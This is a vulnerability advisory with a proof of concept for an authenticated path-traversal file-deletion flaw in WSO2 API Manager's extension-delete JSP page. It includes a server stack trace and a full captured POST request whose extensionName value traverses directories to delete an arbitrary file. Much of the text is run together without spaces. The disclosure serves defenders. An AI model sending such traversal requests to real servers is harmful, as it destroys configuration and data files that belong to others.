# Title:WSO23.1.0-ArbitraryFileDelete
# Date:2020-04-12
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Softwrare link: https://apim.docs.wso2.com/en/latest/
# CVE:N/ADocumentTitle:===============WOS2APIManager(DeleteExtension)ArbitraryFileDelete(Path traversal )
##CVE not assigned yet
##SecurityUpdate: https://apim.docs.wso2.com/en/latest/CommonVulnerabilityScoringSystem:====================================8.5AffectedProduct(s):====================WSO2APIManagerCarbonInterfaceExploitationTechnique:=======================RemoteSeverityLevel:===============HighTechnicalDetails&Description:================================A remote Arbitrary file delete vulnerability has been discovered in the official WSO2APIManagerCarbonUIproduct .
The security vulnerability allows a remote attacker withlow privileges toperform authenticated application requests
and todelete arbitrary Systemfiles.
The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter
of the extension we want todelete.Remote attackers are able todelete arbitrary files as configuration files ,database(.db) files
via authenticated POST method requests witha crafted String arbitrary traversal files names in"extensionName".The security risk of the arbitrary delete vulnerability is estimated as Highwitha cvss (common vulnerability scoring system) count of 8.5.Exploitation of the Path traversal vulnerability requiresa low privilege web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality.===============================ErrorGenerated by Server in case of file not found from 'logfile' ( broughts my atttention ...)[2020-01-0401:40:43,318]ERROR-ResourceServiceClientFailedtoremoveextension.
org.apache.axis2.AxisFault:File does not exist:E:\api-wso2\bin\..\repository\d
eployment\server\registryextensions\commons-dir
at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j
ava:531)~[axis2_1.6.1.wso2v38.jar:?]
at org.apache.axis2.description.OutInAxisOperationClient.handleResponse(OutInAxisOperation.java:382)~[axis2_1.6.1.wso2v38.jar:?]
at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO
peration.java:457)~[axis2_1.6.1.wso2v38.jar:?]
at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(OutInAxisOperation.java:228)~[axis2_1.6.1.wso2v38.jar:?]
at org.apache.axis2.client.OperationClient.execute(OperationClient.java:149)~[axis2_1.6.1.wso2v38.jar:?]
at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem
oveExtension(ResourceAdminServiceStub.java:5954)~[org.wso2.carbon.registry.exte
nsions.stub_4.7.13.jar:?]
at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.deleteExtension(ResourceServiceClient.java:137)[org.wso2.carbon.registry.extens
ions.ui_4.7.13.jar:?]
at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS
ervice(deleteExtension_002dajaxprocessor_jsp.java:139)[hc_795974301/:?]
at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)[t
omcat_9.0.22.wso2v1.jar:?]*Error displayed in Web browser withbody request:<script type="text/javascript">CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");</script>=============================RequestMethod(s):[+]POSTVulnerableModule(s):[+]/carbon/extensions/deleteExtension-ajaxprocessor.jsp
VulnerableParameter(s):[+] extensionName
Server version
3.0.0Proof of Concept(PoC):=======================The security vulnerability can be exploited by remote attackers withlow privileged web-application user account and withno user interaction.
For security demonstration or toreproduce the vulnerability follow the provided information and steps below tocontinue.1-Attacker must have access totheExtensioncomponent(List,Add,Delete extensions )2-attackeruploads any file .jar extension
3-attacker intercepts the request that follows and modifies the parameter withtraversal string:---PoCSessionLogs[POST]---POST/carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1Host: localhost:9443User-Agent:Mozilla/5.0(WindowsNT6.1;Win64; x64; rv:71.0)Gecko/20100101Firefox/71.0Accept: text/javascript, text/html, application/xml, text/xml,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
Content-Length: 22
Origin: https://localhost:9443
Connection: close
Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions
Pragma: no-cache
Cache-Control: no-cache
extensionName=../../../../INSTALL.txt
---------------Returned Headers in Response------------------
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 10
Date: Sat, 04 Jan 2020 00:55:38 GMT
Connection: close
Server: WSO2 Carbon Server
